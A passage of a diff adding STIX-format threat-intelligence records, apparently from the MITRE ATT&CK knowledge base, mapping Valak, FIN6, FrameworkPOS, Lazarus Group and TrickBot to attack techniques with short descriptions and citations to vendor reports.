Loader ConfCrew. Retrieved August 31, 2020." + } + ], + "description": "[Valak](https://attack.mitre.org/software/S0476) can download a module to search for and build a report of harvested credential data.(Citation: SentinelOne Valak June 2020)", + "relationship_type": "uses", + "id": "relationship--7fb8ef27-0c19-4e31-9122-f89cd4283427", + "type": "relationship", + "modified": "2020-09-25T15:49:10.041Z", + "created": "2020-08-31T15:15:56.193Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53", + "target_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", + "external_references": [ + { + "source_name": "SentinelOne Valak June 2020", + "url": "https://assets.sentinelone.com/labs/sentinel-one-valak-i ", + "description": "Reaves, J. and Platt, J. (2020, June). Valak Malware and the Connection to Gozi Loader ConfCrew. Retrieved August 31, 2020." + } + ], + "description": "[Valak](https://attack.mitre.org/software/S0476) can use a .NET compiled module named exchgrabber to enumerate credentials from the Credential Manager.(Citation: SentinelOne Valak June 2020)", + "relationship_type": "uses", + "id": "relationship--13c82683-dea9-418b-9112-a801c4cebc64", + "type": "relationship", + "modified": "2020-09-25T15:49:10.066Z", + "created": "2020-08-31T15:15:56.247Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", + "target_ref": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d", + "external_references": [ + { + "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "description": "FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016.", + "source_name": "FireEye FIN6 April 2016" + } + ], + "description": "[FIN6](https://attack.mitre.org/groups/G0037) has extracted password hashes from ntds.dit to crack offline.(Citation: FireEye FIN6 April 2016)", + "relationship_type": "uses", + "id": "relationship--cef68296-665f-49ed-8a30-c91f8c00096f", + "type": "relationship", + "modified": "2020-09-01T15:08:18.719Z", + "created": "2020-09-01T15:08:18.719Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", + "target_ref": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "external_references": [ + { + "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "source_name": "FireEye FIN6 Apr 2019" + } + ], + "description": "[FIN6](https://attack.mitre.org/groups/G0037) has used has used Metasploit\u2019s named-pipe impersonation technique to escalate privileges.(Citation: FireEye FIN6 Apr 2019)", + "relationship_type": "uses", + "id": "relationship--671cfed4-4809-4f53-a6b0-ff4da289e406", + "type": "relationship", + "modified": "2020-09-08T14:19:02.613Z", + "created": "2020-09-08T14:19:02.613Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", + "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", + "external_references": [ + { + "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "source_name": "FireEye FIN6 Apr 2019" + } + ], + "description": "[FIN6](https://attack.mitre.org/groups/G0037) has deployed a utility script named kill.bat to disable anti-virus.(Citation: FireEye FIN6 Apr 2019)", + "relationship_type": "uses", + "id": "relationship--7107db7b-24f5-473e-9d01-ab858dcf3adc", + "type": "relationship", + "modified": "2020-09-08T14:19:02.690Z", + "created": "2020-09-08T14:19:02.690Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--1cdbbcab-903a-414d-8eb0-439a97343737", + "target_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b", + "external_references": [ + { + "source_name": "SentinelOne FrameworkPOS September 2019", + "url": "https://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/", + "description": "Kremez, V. (2019, September 19). FIN6 \u201cFrameworkPOS\u201d: Point-of-Sale Malware Analysis & Internals. Retrieved September 8, 2020." + } + ], + "description": "[FrameworkPOS](https://attack.mitre.org/software/S0503) can XOR credit card information before exfiltration.(Citation: SentinelOne FrameworkPOS September 2019)", + "relationship_type": "uses", + "id": "relationship--f4c346b3-91ec-4edc-a648-a6273c965e02", + "type": "relationship", + "modified": "2020-10-19T18:43:06.259Z", + "created": "2020-09-08T15:09:46.130Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--1cdbbcab-903a-414d-8eb0-439a97343737", + "target_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", + "external_references": [ + { + "source_name": "SentinelOne FrameworkPOS September 2019", + "url": "https://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/", + "description": "Kremez, V. (2019, September 19). FIN6 \u201cFrameworkPOS\u201d: Point-of-Sale Malware Analysis & Internals. Retrieved September 8, 2020." + } + ], + "description": "[FrameworkPOS](https://attack.mitre.org/software/S0503) can use DNS tunneling for exfiltration of credit card data.(Citation: SentinelOne FrameworkPOS September 2019)", + "relationship_type": "uses", + "id": "relationship--8f064578-a664-4d9e-a907-ec85ef5839b0", + "type": "relationship", + "modified": "2020-10-19T18:43:06.333Z", + "created": "2020-09-08T15:30:29.098Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--1cdbbcab-903a-414d-8eb0-439a97343737", + "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "external_references": [ + { + "source_name": "SentinelOne FrameworkPOS September 2019", + "url": "https://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/", + "description": "Kremez, V. (2019, September 19). FIN6 \u201cFrameworkPOS\u201d: Point-of-Sale Malware Analysis & Internals. Retrieved September 8, 2020." + } + ], + "description": "[FrameworkPOS](https://attack.mitre.org/software/S0503) can collect elements related to credit card data from process memory.(Citation: SentinelOne FrameworkPOS September 2019)", + "relationship_type": "uses", + "id": "relationship--7ccb94c2-fc46-464a-bd44-7c61b46cea5b", + "type": "relationship", + "modified": "2020-09-08T15:30:29.160Z", + "created": "2020-09-08T15:30:29.160Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--1cdbbcab-903a-414d-8eb0-439a97343737", + "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "external_references": [ + { + "source_name": "SentinelOne FrameworkPOS September 2019", + "url": "https://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/", + "description": "Kremez, V. (2019, September 19). FIN6 \u201cFrameworkPOS\u201d: Point-of-Sale Malware Analysis & Internals. Retrieved September 8, 2020." + } + ], + "description": "[FrameworkPOS](https://attack.mitre.org/software/S0503) can enumerate and exclude selected processes on a compromised host to speed execution of memory scraping.(Citation: SentinelOne FrameworkPOS September 2019)", + "relationship_type": "uses", + "id": "relationship--b72be1af-b4d0-4607-8f97-377d23ddbb36", + "type": "relationship", + "modified": "2020-10-19T16:42:09.080Z", + "created": "2020-09-08T15:30:29.208Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", + "target_ref": "malware--1cdbbcab-903a-414d-8eb0-439a97343737", + "external_references": [ + { + "source_name": "SentinelOne FrameworkPOS September 2019", + "url": "https://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/", + "description": "Kremez, V. (2019, September 19). FIN6 \u201cFrameworkPOS\u201d: Point-of-Sale Malware Analysis & Internals. Retrieved September 8, 2020." + }, + { + "source_name": "Crowdstrike Global Threat Report Feb 2018", + "description": "CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018.", + "url": "https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report" + }, + { + "description": "Visa Public. (2019, February). FIN6 Cybercrime Group Expands Threat to eCommerce Merchants. Retrieved September 16, 2019.", + "url": "https://usa.visa.com/dam/VCOM/global/support-legal/documents/fin6-cybercrime-group-expands-threat-To-ecommerce-merchants.pdf", + "source_name": "Visa FIN6 Feb 2019" + } + ], + "description": "(Citation: SentinelOne FrameworkPOS September 2019)(Citation: Crowdstrike Global Threat Report Feb 2018)(Citation: Visa FIN6 Feb 2019)", + "relationship_type": "uses", + "id": "relationship--546bc8ea-9330-47a4-a5d1-d3fe89b1382b", + "type": "relationship", + "modified": "2020-10-19T18:48:18.059Z", + "created": "2020-09-08T15:46:10.564Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", + "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "external_references": [ + { + "source_name": "Trend Micro FIN6 October 2019", + "url": "https://www.trendmicro.com/en_us/research/19/j/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops.html", + "description": "Chen, J. (2019, October 10). Magecart Card Skimmers Injected Into Online Shops. Retrieved September 9, 2020." + }, + { + "source_name": "RiskIQ British Airways September 2018", + "url": "https://riskiq.com/blog/labs/magecart-british-airways-breach/", + "description": "Klijnsma, Y. (2018, September 11). Inside the Magecart Breach of British Airways: How 22 Lines of Code Claimed 380,000 Victims. Retrieved September 9, 2020." + }, + { + "source_name": "RiskIQ Newegg September 2018", + "url": "https://www.riskiq.com/blog/labs/magecart-newegg/", + "description": "Klijnsma, Y. (2018, September 19). Another Victim of the Magecart Assault Emerges: Newegg. Retrieved September 9, 2020." + } + ], + "description": "[FIN6](https://attack.mitre.org/groups/G0037) has collected and exfiltrated payment card data from compromised systems.(Citation: Trend Micro FIN6 October 2019)(Citation: RiskIQ British Airways September 2018)(Citation: RiskIQ Newegg September 2018)", + "relationship_type": "uses", + "id": "relationship--46389d22-1f4d-4597-b03d-30b9ec4146df", + "type": "relationship", + "modified": "2020-09-09T17:39:46.954Z", + "created": "2020-09-09T13:53:35.121Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", + "target_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b", + "external_references": [ + { + "source_name": "FireEye Maze May 2020", + "url": "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "description": "Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020." + } + ], + "description": "(Citation: FireEye Maze May 2020)", + "relationship_type": "uses", + "id": "relationship--a5840067-79c4-4965-832c-ebca455cc17c", + "type": "relationship", + "modified": "2020-09-09T15:19:32.155Z", + "created": "2020-09-09T15:19:32.155Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", + "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", + "external_references": [ + { + "description": "Visa Public. (2019, February). FIN6 Cybercrime Group Expands Threat to eCommerce Merchants. Retrieved September 16, 2019.", + "url": "https://usa.visa.com/dam/VCOM/global/support-legal/documents/fin6-cybercrime-group-expands-threat-To-ecommerce-merchants.pdf", + "source_name": "Visa FIN6 Feb 2019" + } + ], + "description": "[FIN6](https://attack.mitre.org/groups/G0037) has used malicious documents to lure victims into allowing execution of PowerShell scripts.(Citation: Visa FIN6 Feb 2019)", + "relationship_type": "uses", + "id": "relationship--862d150d-ea3c-439e-9a56-b877935e5262", + "type": "relationship", + "modified": "2020-09-09T15:45:49.103Z", + "created": "2020-09-09T15:45:49.103Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", + "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", + "external_references": [ + { + "description": "Visa Public. (2019, February). FIN6 Cybercrime Group Expands Threat to eCommerce Merchants. Retrieved September 16, 2019.", + "url": "https://usa.visa.com/dam/VCOM/global/support-legal/documents/fin6-cybercrime-group-expands-threat-To-ecommerce-merchants.pdf", + "source_name": "Visa FIN6 Feb 2019" + } + ], + "description": "[FIN6](https://attack.mitre.org/groups/G0037) has targeted victims with e-mails containing malicious attachments.(Citation: Visa FIN6 Feb 2019)", + "relationship_type": "uses", + "id": "relationship--0e1bf920-fd5a-4859-bf55-62e5f9817289", + "type": "relationship", + "modified": "2020-09-09T15:45:49.120Z", + "created": "2020-09-09T15:45:49.120Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", + "target_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8", + "external_references": [ + { + "description": "Visa Public. (2019, February). FIN6 Cybercrime Group Expands Threat to eCommerce Merchants. Retrieved September 16, 2019.", + "url": "https://usa.visa.com/dam/VCOM/global/support-legal/documents/fin6-cybercrime-group-expands-threat-To-ecommerce-merchants.pdf", + "source_name": "Visa FIN6 Feb 2019" + } + ], + "description": "[FIN6](https://attack.mitre.org/groups/G0037) has used the Stealer One credential stealer to target web browsers.(Citation: Visa FIN6 Feb 2019)", + "relationship_type": "uses", + "id": "relationship--f097444b-fa65-4457-943c-5061e29f9ef0", + "type": "relationship", + "modified": "2020-09-09T15:57:51.673Z", + "created": "2020-09-09T15:57:51.673Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", + "target_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", + "external_references": [ + { + "description": "Visa Public. (2019, February). FIN6 Cybercrime Group Expands Threat to eCommerce Merchants. Retrieved September 16, 2019.", + "url": "https://usa.visa.com/dam/VCOM/global/support-legal/documents/fin6-cybercrime-group-expands-threat-To-ecommerce-merchants.pdf", + "source_name": "Visa FIN6 Feb 2019" + } + ], + "description": "[FIN6](https://attack.mitre.org/groups/G0037) has used the Stealer One credential stealer to target e-mail and file transfer utilities including FTP.(Citation: Visa FIN6 Feb 2019)", + "relationship_type": "uses", + "id": "relationship--d2212e02-787a-4893-8ecd-d1ac6619bf9f", + "type": "relationship", + "modified": "2020-09-09T15:57:51.730Z", + "created": "2020-09-09T15:57:51.730Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", + "target_ref": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317", + "external_references": [ + { + "source_name": "F-Secure Lazarus Cryptocurrency Aug 2020", + "url": "https://labs.f-secure.com/assets/BlogFiles/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf", + "description": "F-Secure Labs. (2020, August 18). Lazarus Group Campaign Targeting the Cryptocurrency Vertical. Retrieved September 1, 2020." + } + ], + "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) has used fake job advertisements sent via LinkedIn to spearphish victims.(Citation: F-Secure Lazarus Cryptocurrency Aug 2020) ", + "relationship_type": "uses", + "id": "relationship--5edb6fc5-f709-4a0e-a3bc-ae06720f0bcd", + "type": "relationship", + "modified": "2020-09-22T16:26:53.403Z", + "created": "2020-09-10T17:06:35.291Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", + "target_ref": "attack-pattern--5095a853-299c-4876-abd7-ac0050fb5462", + "external_references": [ + { + "source_name": "F-Secure Lazarus Cryptocurrency Aug 2020", + "url": "https://labs.f-secure.com/assets/BlogFiles/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf", + "description": "F-Secure Labs. (2020, August 18). Lazarus Group Campaign Targeting the Cryptocurrency Vertical. Retrieved September 1, 2020." + } + ], + "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) has rebooted victim machines to establish persistence by installing a SSP DLL.(Citation: F-Secure Lazarus Cryptocurrency Aug 2020)", + "relationship_type": "uses", + "id": "relationship--78cac0dc-cae9-41b0-a36a-b27c9a5bd5ab", + "type": "relationship", + "modified": "2020-09-22T16:26:53.408Z", + "created": "2020-09-10T19:00:47.706Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", + "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4", + "external_references": [ + { + "source_name": "F-Secure Lazarus Cryptocurrency Aug 2020", + "url": "https://labs.f-secure.com/assets/BlogFiles/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf", + "description": "F-Secure Labs. (2020, August 18). Lazarus Group Campaign Targeting the Cryptocurrency Vertical. Retrieved September 1, 2020." + } + ], + "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) has modified registry keys using the reg windows utility for its custom backdoor implants.(Citation: F-Secure Lazarus Cryptocurrency Aug 2020)", + "relationship_type": "uses", + "id": "relationship--f783f939-179d-4739-a2df-97d1d69672bd", + "type": "relationship", + "modified": "2020-09-22T16:26:53.430Z", + "created": "2020-09-10T19:00:47.708Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", + "target_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", + "external_references": [ + { + "source_name": "F-Secure Lazarus Cryptocurrency Aug 2020", + "url": "https://labs.f-secure.com/assets/BlogFiles/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf", + "description": "F-Secure Labs. (2020, August 18). Lazarus Group Campaign Targeting the Cryptocurrency Vertical. Retrieved September 1, 2020." + } + ], + "description": "A [Lazarus Group](https://attack.mitre.org/groups/G0032) custom backdoor implant included a custom PE loader named \"Security Package\" that was added into the lsass.exe process via registry key.(Citation: F-Secure Lazarus Cryptocurrency Aug 2020) ", + "relationship_type": "uses", + "id": "relationship--af57a3e4-badf-44df-a208-694ea49e107c", + "type": "relationship", + "modified": "2020-09-22T18:22:31.373Z", + "created": "2020-09-10T19:00:47.717Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", + "target_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", + "external_references": [ + { + "source_name": "F-Secure Lazarus Cryptocurrency Aug 2020", + "url": "https://labs.f-secure.com/assets/BlogFiles/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf", + "description": "F-Secure Labs. (2020, August 18). Lazarus Group Campaign Targeting the Cryptocurrency Vertical. Retrieved September 1, 2020." + } + ], + "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) has used Themida to pack at least two separate backdoor implants.(Citation: F-Secure Lazarus Cryptocurrency Aug 2020)", + "relationship_type": "uses", + "id": "relationship--8ae1d1da-2721-4cd0-a835-1276a7835839", + "type": "relationship", + "modified": "2020-09-22T16:26:53.905Z", + "created": "2020-09-10T19:00:47.729Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", + "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "external_references": [ + { + "source_name": "F-Secure Lazarus Cryptocurrency Aug 2020", + "url": "https://labs.f-secure.com/assets/BlogFiles/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf", + "description": "F-Secure Labs. (2020, August 18). Lazarus Group Campaign Targeting the Cryptocurrency Vertical. Retrieved September 1, 2020." + } + ], + "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) has used VBScript to gather information about a victim machine. (Citation: F-Secure Lazarus Cryptocurrency Aug 2020)", + "relationship_type": "uses", + "id": "relationship--57980e08-060a-438e-ab65-6cbd71e22ee2", + "type": "relationship", + "modified": "2020-09-22T18:22:31.404Z", + "created": "2020-09-10T19:00:47.786Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", + "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", + "external_references": [ + { + "source_name": "F-Secure Lazarus Cryptocurrency Aug 2020", + "url": "https://labs.f-secure.com/assets/BlogFiles/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf", + "description": "F-Secure Labs. (2020, August 18). Lazarus Group Campaign Targeting the Cryptocurrency Vertical. Retrieved September 1, 2020." + } + ], + "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) has used Powershell to download malicious payloads.(Citation: F-Secure Lazarus Cryptocurrency Aug 2020)", + "relationship_type": "uses", + "id": "relationship--0f1097c2-f0c6-4de1-a003-42531e57e6a3", + "type": "relationship", + "modified": "2020-09-22T16:26:53.924Z", + "created": "2020-09-10T19:00:47.793Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", + "target_ref": "attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade", + "external_references": [ + { + "source_name": "F-Secure Lazarus Cryptocurrency Aug 2020", + "url": "https://labs.f-secure.com/assets/BlogFiles/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf", + "description": "F-Secure Labs. (2020, August 18). Lazarus Group Campaign Targeting the Cryptocurrency Vertical. Retrieved September 1, 2020." + } + ], + "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) has used mshta.exe to run malicious scripts and download programs.(Citation: F-Secure Lazarus Cryptocurrency Aug 2020)", + "relationship_type": "uses", + "id": "relationship--47814baa-73c1-4b3f-8e40-bb91b24a533b", + "type": "relationship", + "modified": "2020-09-22T16:26:53.925Z", + "created": "2020-09-10T19:00:47.800Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--00806466-754d-44ea-ad6f-0caf59cb8556", + "target_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c", + "external_references": [ + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + } + ], + "description": "[TrickBot](https://attack.mitre.org/software/S0266) can Base64-encode C2 commands.(Citation: Cyberreason Anchor December 2019)", + "relationship_type": "uses", + "id": "relationship--7d13961a-5fcc-4c97-aeda-f3e42325aabf", + "type": "relationship", + "modified": "2020-09-11T13:27:44.314Z", + "created": "2020-09-11T13:27:44.314Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--00806466-754d-44ea-ad6f-0caf59cb8556", + "target_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", + "external_references": [ + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + } + ], + "description": "[TrickBot](https://attack.mitre.org/software/S0266) can identify the groups the user on a compromised host belongs to.(Citation: Cyberreason Anchor December 2019)", + "relationship_type": "uses", + "id": "relationship--887d8bb3-1bd5-4010-81dc-fe479690e72d", + "type": "relationship", + "modified": "2020-09-11T13:27:44.324Z", + "created": "2020-09-11T13:27:44.324Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--00806466-754d-44ea-ad6f-0caf59cb8556", + "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", + "external_references": [ + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + } + ], + "description": "[TrickBot](https://attack.mitre.org/software/S0266) can identify the user and groups the user belongs to on a compromised host.(Citation: Cyberreason Anchor December 2019)", + "relationship_type": "uses", + "id": "relationship--03251067-ee3a-49e4-addc-86daaa8a3203", + "type": "relationship", + "modified": "2020-09-11T13:27:44.326Z", + "created": "2020-09-11T13:27:44.326Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--00806466-754d-44ea-ad6f-0caf59cb8556", + "target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082", + "external_references": [ + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + } + ], + "description": "[TrickBot](https://attack.mitre.org/software/S0266) has come with a signed downloader component.(Citation: Cyberreason Anchor December 2019)", + "relationship_type": "uses", + "id": "relationship--c94a3ac7-1f05-460b-9bff-67fafd260e01", + "type": "relationship", + "modified": "2020-09-11T13:27:44.344Z", + "created": 